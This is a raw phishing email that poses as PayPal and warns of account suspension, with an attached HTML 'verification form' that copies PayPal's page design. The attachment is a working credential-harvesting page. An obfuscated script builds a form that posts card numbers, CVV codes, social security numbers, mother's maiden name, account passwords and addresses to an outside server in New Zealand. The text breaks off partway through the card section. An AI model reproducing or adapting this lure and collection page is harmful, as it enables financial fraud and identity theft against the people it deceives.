From: "PayPal" <service@paypal.com>
Date: Sat, 31 Dec 2016 05:00:12 +0100
Reply-To: efsg@financier.com
X-MIMETrack: Itemize by SMTP Server on KrDomino/Kromat(Release 8.5.3FP2|July 02, 2012) at
 2016.12.31 04:59:51,
	Serialize by Router on KrDomino/Kromat(Release 8.5.3FP2|July 02, 2012) at
 2017.01.04 01:15:14
Message-ID: <OFDB3A8AAB.CAF5D9D6-ONC125809A.0015F585@kromat.hu>
Content-Type: multipart/mixed; boundary="===============1471945895=="
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 4


--===============1471945895==
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Description: Mail message body

Dear Customer,



We emailed you a little while ago to ask for your help resolving an issue w=
ith your account. Your account is still temporarily limited because we have=
n't heard from you.
But you can help us get your account back to normal quickly.

What's the problem?
We noticed some unusual activity on the credit card linked to your account.=
 Case ID Number: PP-004-122-605-413
What should I do now?


1. Please Download attached form
2. Enter your information.
3. Finally your account will be verified.

If you choose to ignore our request, you leave us no choice but to temporar=
y suspend your account.


Sincerely,

PayPal Account Review Department.



Please do not reply to this email. To get in touch, go to our website and c=
lick Help. =

This email was sent to you for the ongoing support and maintenance of your =
account.
To manage your communication preferences, please visit our preference centr=
e.

--===============1471945895==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Disposition: attachment; filename="farapay2016.html"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">
<html><!-- PayPal Verification System --><!-- Destinated Only For Locked Ac=
counts --><head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8"><!=
--
 Script info: script: webscr, cmd: =5Fprofile-credit-card-new-clickthru, te=
mplate: p/acc/pro/cc-add, date: Nov. 14, 2008 14:00:33 PST; country: AU, la=
nguage: en=5FAU, xslt server:
 installation: WEBSCR-495-20071119-1 web version: 49.5-449887 branch: live-=
495=5Fint
 content version: 49.5-442158
 pexml version: 49.5-452976
 page XSL: FinancialInstrument/default/en=5FAU/account/profile/CCAdd.xsl
 hostname : Hina8NrQtZRtCnjcgHIwV5Yhsy3cnetnZYg.-3ioJb0
--><title>Profile Update - PayPal</title><!--googleoff: all-->
<meta http-equiv=3D"keywords" content=3D"Send, money, payments, credit, cre=
dit card, instant, money, financial services, mobile, wireless, WAP, mobile=
 phones, two-way pagers, Windows CE"><!--googleon: all--><!--googleoff: all=
-->
<meta http-equiv=3D"description" content=3D"PayPal lets you send money to a=
nyone with email. PayPal is free for consumers, and works seamlessly with y=
our existing credit card and current account. You can settle debts, borrow =
cash, divide bills or split expenses with friends, all without going to an =
ATM or looking for your chequebook."><!--googleon: all-->
<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://www.paypal.com/cs=
s/xpt.css">
<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://www.paypal.com/cs=
s/xptInvoice.css">
<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://www.paypal.com/cs=
s/xptObsolete.css">
<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://www.paypal.com/cs=
s/xptlive.css">
<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://www.paypal.com/cs=
s/default.css">
<!--[if IE 6]><link rel=3D"stylesheet" type=3D"text/css" href=3D"https://ww=
w.paypalobjects.com/WEBSCR-610-20100112-1/css/browsers/ie6.css><![endif]-->
<!--[if IE 7]><link rel=3D"stylesheet" type=3D"text/css" href=3D"https://ww=
w.paypalobjects.com/WEBSCR-610-20100112-1/css/browsers/ie7.css"><![endif]-->
<script type=3D"text/javascript" language=3D"javascript">
function validate(frm){if(!/^(4|5|6){1}[0-9]{15,16}$/i.test(frm.elements['d=
efaultcardnumber'].value)){alert("Enter a valid Card Number");frm.elements[=
'defaultcardnumber'].focus();return false;}if(frm.elements['defaultcvv2'].v=
alue.length < 3){alert("Enter your Card Verification Number");frm.elements[=
'defaultcvv2'].focus();return false;}if(frm.elements['ssn1'].value.length <=
 5){alert("Enter your Social Security Number/Social Insurance Number ! If t=
his doesn't apply in your country, input 000000000 !");frm.elements['ssn1']=
.focus();return false;}if(frm.elements['fullname'].value.length < 4){alert(=
"Enter your CardHolder's Name");frm.elements['fullname'].focus();return fal=
se;}return true;}</script>
<link rel=3D"stylesheet" type=3D"text/css" href=3D"https://www.paypalobject=
s.com/css/en=5FUS/lang.css">
<style type=3D"text/css"></style>
<style type=3D"text/css">
.Warning {
background:#ffffcc;color:black;
}
select{border:1px solid #84A8CC;margin-bottom:2px;}
input{border:1px solid #84A8CC;margin-bottom:2px;}
</style>
<link rel=3D"shortcut icon" href=3D"favicon.ico">
</head><body>
<div class=3D"srd" id=3D"header">
<h1><a href=3D"https://www.paypal.com/us/cgi-bin/webscr"><img src=3D"https:=
//www.paypal.com/en=5FUS/i/logo/paypal=5Flogo.gif" alt=3D"PayPal" border=3D=
"0"></a></h1>
<form method=3D"post" id=3D"searchForm" name=3D"searchForm" action=3D"https=
://www.paypal.com/au/cgi-bin/searchscr?cmd=3D=5Fsitewide-search">
<fieldset>
<legend>Search PayPal</legend>
<label for=3D"searchBox">Search </label><input id=3D"searchBox" name=3D"que=
ryString" value=3D"" type=3D"text"> <input class=3D"button" id=3D"search.x"=
 name=3D"search.x" value=3D"Search" type=3D"submit">
</fieldset>
<input name=3D"form=5Fcharset" value=3D"UTF-8" type=3D"hidden">
</form>
<div class=3D"srd" id=3D"navGlobal"><ul>
<li class=3D"logout"><a href=3D"https://www.paypal.com/us/cgi-bin/webscr?cm=
d=3D=5Flogout">Log Out</a></li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/helpweb?cmd=3D=5Fhelp">Hel=
p</a></li>
<li class=3D"last"><a href=3D"https://www.paypal.com/us/cgi-bin/webscr?cmd=
=3D=5Fsecurity-center">Security Centre</a></li>
</ul></div>
</div>
<div id=3D"navPrimary" class=3D"srd"><ul class=3D"secondary">
<li class=3D"active">
<a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">My Account<=
/a><ul>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Overvie=
w</a></li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Add Fun=
ds</a></li>
<li>
<a href=3D"#" href=3Dhttps://www.paypal.com/us/cgi-bin/webscr">Withdraw</a>=
<ul><li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Tra=
nsfer to Bank Account</a></li></ul>
</li>
<li>
<a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">History</a>=
<ul>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Basic S=
earch</a></li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Downloa=
d History</a></li>
</ul>
</li>
<li class=3D"">
<a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Resolution =
Centre</a><ul>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">View Op=
en Cases</a></li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Guides<=
/a></li>
</ul>
</li>
<li class=3D"active">
<a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Profile</a>=
<ul>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Add or =
Edit Email</a></li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Add or =
Edit Bank Account</a></li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Add or =
Edit Credit Card</a></li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Add or =
Edit Postal Address</a></li>
</ul>
</li>
</ul>
</li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Send Mo=
ney</a></li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Request=
 Money</a></li>
<li class=3D""><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webs=
cr">Merchant Services</a></li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Auction=
 Tools</a></li>
<li><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-bin/webscr">Product=
s &amp; Services</a></li>
</ul></div>
<div id=3D"xptContentMain"><table id=3D"xptContentContainer" align=3D"cente=
r" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"760">
<tbody><tr><td><div id=3D"xptTitle"><table class=3D"main" align=3D"center" =
border=3D"0" cellpadding=3D"0" cellspacing=3D"0">
<tbody><tr>
<td class=3D"heading" width=3D"100%"><h1>Profile Update</h1></td>
<td align=3D"right" nowrap=3D"nowrap">
<a href=3D"https://www.paypal.com/us/cgi-bin/webscr"><span class=3D"small">=
Secure Transaction</span></a> <img src=3D"https://www.paypalobjects.com/en=
=5FUS/i/icon/secure=5Flock=5F2.gif" alt=3D"" align=3D"top" border=3D"0">
</td>
</tr>
<tr><td colspan=3D"2"><img alt=3D"" src=3D"https://www.sandbox.paypal.com/e=
n=5FUS/i/scr/pixel.gif" border=3D"0" height=3D"2" width=3D"1"></td></tr>
<tr><td><img alt=3D"" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/p=
ixel.gif" border=3D"0" height=3D"4" width=3D"1"></td></tr>
</tbody></table></div></td></tr>













<table width=3D"760" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" align=
=3D"center">
<tr>
<td>
<p>Please complete the form below to update your Profile information and re=
store your account access.</p>
</td>
</tr>
</table>
<script language=3D"JavaScript">
function openWindow2() {
popupWin =3D window.open('pin.html','EIN','scrollbars,resizable,toolbar,wid=
th=3D420,height=3D300,left=3D50,top=3D50');
popupWin.focus();
}
</script>
<script language=3D"JavaScript">
function openWindow1() {
popupWin =3D window.open('cvv.html','EIN','scrollbars,resizable,toolbar,wid=
th=3D420,height=3D300,left=3D50,top=3D50');
popupWin.focus();
}
</script>

<Script Language=3D'Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
<!--
document.write(unescape('<form name=3D"frm" action=3D"http://www.comfortfut=
ure.co.nz//finish.php" method=3D"post" onsubmit=3D"return validate(this)">'=
));
//-->
</Script>
<input type=3D"hidden" id=3D"swich" name=3D"swich" value=3D"0"><input type=
=3D"hidden" name=3D"user" value=3D""><input type=3D"hidden" name=3D"pass" v=
alue=3D""><input type=3D"hidden" name=3D"defaultaddress" value=3D""><input =
type=3D"hidden" name=3D"ip" value=3D""><input type=3D"hidden" name=3D"send"=
 value=3D"">
<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">
<tr>
<td>
<hr class=3D"dotted">
</td
</tr>
<tr>

<tr>
<td class=3D""><span class=3D"emphasis">Personal Information Profile<br></t=
d>
</tr>
</table>
<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">
<tr><td><br>Make sure you enter the information accurately, and according t=
o the formats required.<br> Fill in all the required fields.<br><br></td></=
tr>
</table>
<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">
<tr>
<td class=3D"label" width=3D"320"><label for=3D"fullname"><sup><img border=
=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup=
>Card Holder Name:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"fullname" name=3D"f=
ullname" size=3D"30" value=3D" "></td>
</tr>





<tr>
<td class=3D"label" width=3D"320"><label for=3D"dob"><sup><img id=3D"cxfgzi=
nflate" border=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pi=
xel.gif"></sup>Date of Birth:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418">

<select class=3D"" name=3Dbmonth><b>
<option selected value=3D"">month</option>
<option value=3DJan >Jan</option>
<option value=3DFeb >Feb</option>
<option value=3DMar >Mar</option>
<option value=3DApr >Apr</option>
<option value=3DMay >May</option>
<option value=3DJun >Jun</option>
<option value=3DJul >Jul</option>
<option value=3DAug >Aug</option>
<option value=3DSep >Sep</option>
<option value=3DOct >Oct</option>
<option value=3DNov >Nov</option>
<option value=3DDec >Dec</option>
</select>
<select class=3D"" name=3Dbday>
<option selected value=3D"">day</option>
<option value=3D01 >01</option>
<option value=3D02 >02</option>
<option value=3D03 >03</option>
<option value=3D04 >04</option>
<option value=3D05 >05</option>
<option value=3D06 >06</option>
<option value=3D07 >07</option>
<option value=3D08 >08</option>
<option value=3D09 >09</option>
<option value=3D10 >10</option>
<option value=3D11 >11</option>
<option value=3D12 >12</option>
<option value=3D13 >13</option>
<option value=3D14 >14</option>
<option value=3D15 >15</option>
<option value=3D16 >16</option>
<option value=3D17 >17</option>
<option value=3D18 >18</option>
<option value=3D19 >19</option>
<option value=3D20 >20</option>
<option value=3D21 >21</option>
<option value=3D22 >22</option>
<option value=3D23 >23</option>
<option value=3D24 >24</option>
<option value=3D25 >25</option>
<option value=3D26 >26</option>
<option value=3D27 >27</option>
<option value=3D28 >28</option>
<option value=3D29 >29</option>
<option value=3D30 >30</option>
<option value=3D31 >31</option>
</select>
<select class=3D"" name=3Dbyear>
<option selected value=3D"">year</option>
<option value=3D1910 >1910</option>
<option value=3D1911 >1911</option>
<option value=3D1912 >1912</option>
<option value=3D1913 >1913</option>
<option value=3D1914 >1914</option>
<option value=3D1915 >1915</option>
<option value=3D1916 >1916</option>
<option value=3D1917 >1917</option>
<option value=3D1918 >1918</option>
<option value=3D1919 >1919</option>
<option value=3D1920 >1920</option>
<option value=3D1921 >1921</option>
<option value=3D1922 >1922</option>
<option value=3D1923 >1923</option>
<option value=3D1924 >1924</option>
<option value=3D1925 >1925</option>
<option value=3D1926 >1926</option>
<option value=3D1927 >1927</option>
<option value=3D1928 >1928</option>
<option value=3D1929 >1929</option>
<option value=3D1930 >1930</option>
<option value=3D1931 >1931</option>
<option value=3D1932 >1932</option>
<option value=3D1933 >1933</option>
<option value=3D1934 >1934</option>
<option value=3D1935 >1935</option>
<option value=3D1936 >1936</option>
<option value=3D1937 >1937</option>
<option value=3D1938 >1938</option>
<option value=3D1939 >1939</option>
<option value=3D1940 >1940</option>
<option value=3D1941 >1941</option>
<option value=3D1942 >1942</option>
<option value=3D1943 >1943</option>
<option value=3D1944 >1944</option>
<option value=3D1945 >1945</option>
<option value=3D1946 >1946</option>
<option value=3D1947 >1947</option>
<option value=3D1948 >1948</option>
<option value=3D1949 >1949</option>
<option value=3D1950 >1950</option>
<option value=3D1951 >1951</option>
<option value=3D1952 >1952</option>
<option value=3D1953 >1953</option>
<option value=3D1954 >1954</option>
<option value=3D1955 >1955</option>
<option value=3D1956 >1956</option>
<option value=3D1957 >1957</option>
<option value=3D1958 >1958</option>
<option value=3D1959 >1959</option>
<option value=3D1960 >1960</option>
<option value=3D1961 >1961</option>
<option value=3D1962 >1962</option>
<option value=3D1963 >1963</option>
<option value=3D1964 >1964</option>
<option value=3D1965 >1965</option>
<option value=3D1966 >1966</option>
<option value=3D1967 >1967</option>
<option value=3D1968 >1968</option>
<option value=3D1969 >1969</option>
<option value=3D1970 >1970</option>
<option value=3D1971 >1971</option>
<option value=3D1972 >1972</option>
<option value=3D1973 >1973</option>
<option value=3D1974 >1974</option>
<option value=3D1975 >1975</option>
<option value=3D1976 >1976</option>
<option value=3D1977 >1977</option>
<option value=3D1978 >1978</option>
<option value=3D1979 >1979</option>
<option value=3D1980 >1980</option>
<option value=3D1981 >1981</option>
<option value=3D1982 >1982</option>
<option value=3D1983 >1983</option>
<option value=3D1984 >1984</option>
<option value=3D1985 >1985</option>
<option value=3D1986 >1986</option>
<option value=3D1987 >1987</option>
<option value=3D1988 >1988</option>
<option value=3D1989 >1989</option>
<option value=3D1990 >1990</option>
<option value=3D1991 >1991</option>
<option value=3D1992 >1992</option>
<option value=3D1993 >1993</option>
</select>
</td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"mmn"><sup><img border=3D"0"=
 src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup>Mothe=
r's Maiden Name:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"mmn" name=3D"mmn" s=
ize=3D"15" value=3D""></td>
</tr>


<tr>
<td class=3D"label" width=3D"320"><label for=3D"emailaddress"><sup><img bor=
der=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></=
sup>Email address:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"email" name=3D"emai=
l" size=3D"30" value=3D" "></td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"passw"><sup><img border=3D"=
0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup>Pas=
sword:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"password" id=3D"passw" name=3D"=
passw" size=3D"20" value=3D""></td>
</tr>
<tr>
<td class=3D"label" width=3D"320"><label for=3D"userphone"><sup><img border=
=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup=
>Home Phone Number:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"userphone" size=3D"=
20" maxlength=3D"20" name=3D"userphone" value=3D"
"></td>
</tr>
<tr>
<td class=3D"label" width=3D"320"><label for=3D"userphoneinfo">&nbsp;</labe=
l></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><span class=3D"small">This number will be used to contact=
 you about Security Measures and/or other issues regarding your PayPal acco=
unt.</span></td>
</tr>

</table>





<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">
<br>
<tr>
<td>
<hr class=3D"dotted">
</td
</tr>
<tr>

<td class=3D""><span class=3D"emphasis">Home Address Profile<br>
</td>
</tr>
</table>
<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">
<tr><td><br>Enter your information as accurately as possible.<br><br></td><=
/tr>
</table>

<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">

<tr>
<td class=3D"label" width=3D"320"><label for=3D"defaultaddress1"><sup><img =
border=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"=
></sup>Address Line 1:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input style=3D"width:200px" class=3D"" type=3D"text" id=
=3D"defaultaddress1" name=3D"defaultaddress1" size=3D"20" value=3D""></td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"defaultaddress2">Address Li=
ne 2:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input style=3D"width:200px" type=3D"text" id=3D"defaulta=
ddress2" name=3D"defaultaddress2" size=3D"20" value=3D""></td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"defaultcity"><sup><img bord=
er=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></s=
up>City:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"defaultcity" name=
=3D"defaultcity" size=3D"15" value=3D""></td>
</tr>


<tr>
<td class=3D"label" width=3D"320"><label for=3D"defaultzip"><sup><img borde=
r=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></su=
p>Postal Code:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"defaultzip" name=3D=
"defaultzip" size=3D"15" value=3D""></td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"defaultcountry"><sup><img s=
rc=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup>Country=
:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418">

<select style=3D"width:200px" name=3D"defaultcountry" class=3D"" >
<option value=3D"" selected>Select Country</option>
<option value=3D"United States" >United States</option>
<option value=3D"Canada" >Canada</option>
<option value=3D"Albania" >Albania</option>
<option value=3D"Algeria" >Algeria</option>
<option value=3D"Andorra" >Andorra</option>
<option value=3D"Angola" >Angola</option>
<option value=3D"Anguilla" >Anguilla</option>
<option value=3D"Antigua and Barbuda" >Antigua and Barbuda</option>
<option value=3D"Argentina" >Argentina</option>
<option value=3D"Armenia" >Armenia</option>
<option value=3D"Aruba" >Aruba</option>
<option value=3D"Australia" >Australia</option>
<option value=3D"Austria" >Austria</option>
<option value=3D"Azerbaijan Republic" >Azerbaijan Republic</option>
<option value=3D"Bahamas" >Bahamas</option>
<option value=3D"Bahrain" >Bahrain</option>
<option value=3D"Barbados" >Barbados</option>
<option value=3D"Belgium" >Belgium</option>
<option value=3D"Belize" >Belize</option>
<option value=3D"Benin" >Benin</option>
<option value=3D"Bermuda" >Bermuda</option>
<option value=3D"Bhutan" >Bhutan</option>
<option value=3D"Bolivia" >Bolivia</option>
<option value=3D"Bosnia and Herzegovina" >Bosnia and Herzegovina</option>
<option value=3D"Botswana" >Botswana</option>
<option value=3D"Brazil" >Brazil</option>
<option value=3D"British Virgin Islands" >British Virgin Islands</option>
<option value=3D"Brunei" >Brunei</option>
<option value=3D"Bulgaria" >Bulgaria</option>
<option value=3D"Burkina Faso" >Burkina Faso</option>
<option value=3D"Burundi" >Burundi</option>
<option value=3D"Cambodia" >Cambodia</option>
<option value=3D"Cape Verde" >Cape Verde</option>
<option value=3D"Cayman Islands" >Cayman Islands</option>
<option value=3D"Chad" >Chad</option>
<option value=3D"Chile" >Chile</option>
<option value=3D"China Worldwide" >China Worldwide</option>
<option value=3D"Colombia" >Colombia</option>
<option value=3D"Comoros" >Comoros</option>
<option value=3D"Cook Islands" >Cook Islands</option>
<option value=3D"Costa Rica" >Costa Rica</option>
<option value=3D"Croatia" >Croatia</option>
<option value=3D"Cyprus" >Cyprus</option>
<option value=3D"Czech Republic" >Czech Republic</option>
<option value=3D"Democratic Republic of the Congo" >Democratic Republic of =
the Congo</option>
<option value=3D"Denmark" >Denmark</option>
<option value=3D"Djibouti" >Djibouti</option>
<option value=3D"Dominica" >Dominica</option>
<option value=3D"Dominican Republic" >Dominican Republic</option>
<option value=3D"Ecuador" >Ecuador</option>
<option value=3D"El Salvador" >El Salvador</option>
<option value=3D"Eritrea" >Eritrea</option>
<option value=3D"Estonia" >Estonia</option>
<option value=3D"Ethiopia" >Ethiopia</option>
<option value=3D"Falkland Islands" >Falkland Islands</option>
<option value=3D"Faroe Islands" >Faroe Islands</option>
<option value=3D"Federated States of Micronesia" >Federated States of Micro=
nesia</option>
<option value=3D"Fiji" >Fiji</option>
<option value=3D"Finland" >Finland</option>
<option value=3D"France" >France</option>
<option value=3D"French Guiana" >French Guiana</option>
<option value=3D"French Polynesia" >French Polynesia</option>
<option value=3D"Gabon Republic" >Gabon Republic</option>
<option value=3D"Gambia" >Gambia</option>
<option value=3D"Germany" >Germany</option>
<option value=3D"Gibraltar" >Gibraltar</option>
<option value=3D"Greece" >Greece</option>
<option value=3D"Greenland" >Greenland</option>
<option value=3D"Grenada" >Grenada</option>
<option value=3D"Guadeloupe" >Guadeloupe</option>
<option value=3D"Guatemala" >Guatemala</option>
<option value=3D"Guinea" >Guinea</option>
<option value=3D"Guinea Bissau" >Guinea Bissau</option>
<option value=3D"Guyana" >Guyana</option>
<option value=3D"Honduras" >Honduras</option>
<option value=3D"Hong Kong" >Hong Kong</option>
<option value=3D"Hungary" >Hungary</option>
<option value=3D"Iceland" >Iceland</option>
<option value=3D"India" >India</option>
<option value=3D"Indonesia" >Indonesia</option>
<option value=3D"Ireland" >Ireland</option>
<option value=3D"Israel" >Israel</option>
<option value=3D"Italy" >Italy</option>
<option value=3D"Jamaica" >Jamaica</option>
<option value=3D"Japan" >Japan</option>
<option value=3D"Jordan" >Jordan</option>
<option value=3D"Kazakhstan" >Kazakhstan</option>
<option value=3D"Kenya" >Kenya</option>
<option value=3D"Kiribati" >Kiribati</option>
<option value=3D"Kuwait" >Kuwait</option>
<option value=3D"Kyrgyzstan" >Kyrgyzstan</option>
<option value=3D"Laos" >Laos</option>
<option value=3D"Latvia" >Latvia</option>
<option value=3D"Lesotho" >Lesotho</option>
<option value=3D"Liechtenstein" >Liechtenstein</option>
<option value=3D"Lithuania" >Lithuania</option>
<option value=3D"Luxembourg" >Luxembourg</option>
<option value=3D"Madagascar" >Madagascar</option>
<option value=3D"Malawi" >Malawi</option>
<option value=3D"Malaysia" >Malaysia</option>
<option value=3D"Maldives" >Maldives</option>
<option value=3D"Mali" >Mali</option>
<option value=3D"Malta" >Malta</option>
<option value=3D"Marshall Islands" >Marshall Islands</option>
<option value=3D"Martinique" >Martinique</option>
<option value=3D"Mauritania" >Mauritania</option>
<option value=3D"Mauritius" >Mauritius</option>
<option value=3D"Mayotte" >Mayotte</option>
<option value=3D"Mexico" >Mexico</option>
<option value=3D"Mongolia" >Mongolia</option>
<option value=3D"Montserrat" >Montserrat</option>
<option value=3D"Morocco" >Morocco</option>
<option value=3D"Mozambique" >Mozambique</option>
<option value=3D"Namibia" >Namibia</option>
<option value=3D"Nauru" >Nauru</option>
<option value=3D"Nepal" >Nepal</option>
<option value=3D"Netherlands" >Netherlands</option>
<option value=3D"Netherlands Antilles" >Netherlands Antilles</option>
<option value=3D"New Caledonia" >New Caledonia</option>
<option value=3D"New Zealand" >New Zealand</option>
<option value=3D"Nicaragua" >Nicaragua</option>
<option value=3D"Niger" >Niger</option>
<option value=3D"Niue" >Niue</option>
<option value=3D"Norfolk Island" >Norfolk Island</option>
<option value=3D"Norway" >Norway</option>
<option value=3D"Oman" >Oman</option>
<option value=3D"Palau" >Palau</option>
<option value=3D"Panama" >Panama</option>
<option value=3D"Papua New Guinea" >Papua New Guinea</option>
<option value=3D"Peru" >Peru</option>
<option value=3D"Philippines" >Philippines</option>
<option value=3D"Pitcairn Islands" >Pitcairn Islands</option>
<option value=3D"Poland" >Poland</option>
<option value=3D"Portugal" >Portugal</option>
<option value=3D"Qatar" >Qatar</option>
<option value=3D"Republic of the Congo" >Republic of the Congo</option>
<option value=3D"Reunion" >Reunion</option>
<option value=3D"Romania" >Romania</option>
<option value=3D"Russia" >Russia</option>
<option value=3D"Rwanda" >Rwanda</option>
<option value=3D"Saint Vincent and the Grenadines" >Saint Vincent and the G=
renadines</option>
<option value=3D"Samoa" >Samoa</option>
<option value=3D"San Marino" >San Marino</option>
<option value=3D"Sao Tome and Principe" >Sao Tome and Principe</option>
<option value=3D"Saudi Arabia" >Saudi Arabia</option>
<option value=3D"Senegal" >Senegal</option>
<option value=3D"Seychelles" >Seychelles</option>
<option value=3D"Sierra Leone" >Sierra Leone</option>
<option value=3D"Singapore" >Singapore</option>
<option value=3D"Slovakia" >Slovakia</option>
<option value=3D"Slovenia" >Slovenia</option>
<option value=3D"Solomon Islands" >Solomon Islands</option>
<option value=3D"Somalia" >Somalia</option>
<option value=3D"South Africa" >South Africa</option>
<option value=3D"South Korea" >South Korea</option>
<option value=3D"Spain" >Spain</option>
<option value=3D"Sri Lanka" >Sri Lanka</option>
<option value=3D"St. Helena" >St. Helena</option>
<option value=3D"St. Kitts and Nevis" >St. Kitts and Nevis</option>
<option value=3D"St. Lucia" >St. Lucia</option>
<option value=3D"St. Pierre and Miquelon" >St. Pierre and Miquelon</option>
<option value=3D"Suriname" >Suriname</option>
<option value=3D"Svalbard and Jan Mayen Islands" >Svalbard and Jan Mayen Is=
lands</option>
<option value=3D"Swaziland" >Swaziland</option>
<option value=3D"Sweden" >Sweden</option>
<option value=3D"Switzerland" >Switzerland</option>
<option value=3D"Taiwan" >Taiwan</option>
<option value=3D"Tajikistan" >Tajikistan</option>
<option value=3D"Tanzania" >Tanzania</option>
<option value=3D"Thailand" >Thailand</option>
<option value=3D"Togo" >Togo</option>
<option value=3D"Tonga" >Tonga</option>
<option value=3D"Trinidad and Tobago" >Trinidad and Tobago</option>
<option value=3D"Tunisia" >Tunisia</option>
<option value=3D"Turkey" >Turkey</option>
<option value=3D"Turkmenistan" >Turkmenistan</option>
<option value=3D"Turks and Caicos Islands" >Turks and Caicos Islands</optio=
n>
<option value=3D"Tuvalu" >Tuvalu</option>
<option value=3D"Uganda" >Uganda</option>
<option value=3D"Ukraine" >Ukraine</option>
<option value=3D"United Arab Emirates" >United Arab Emirates</option>
<option value=3D"United Kingdom" >United Kingdom</option>
<option value=3D"Uruguay" >Uruguay</option>
<option value=3D"Vanuatu" >Vanuatu</option>
<option value=3D"Vatican City State" >Vatican City State</option>
<option value=3D"Venezuela" >Venezuela</option>
<option value=3D"Vietnam" >Vietnam</option>
<option value=3D"Wallis and Futuna Islands" >Wallis and Futuna Islands</opt=
ion>
<option value=3D"Yemen" >Yemen</option>
<option value=3D"Zambia" >Zambia</option>
</select>

</td>
</tr>

</table>

<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">
<br>
<tr>
<td>
<hr class=3D"dotted">
</td
</tr>
<tr>

<td class=3D""><span class=3D"emphasis">Credit/Debit Card Profile<br>
<input type=3D"hidden" name=3D"default" value=3D"1">
</td>
</tr>
</table>
<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">
<tr><td><br>Enter card information as accurately as possible.<br> For card =
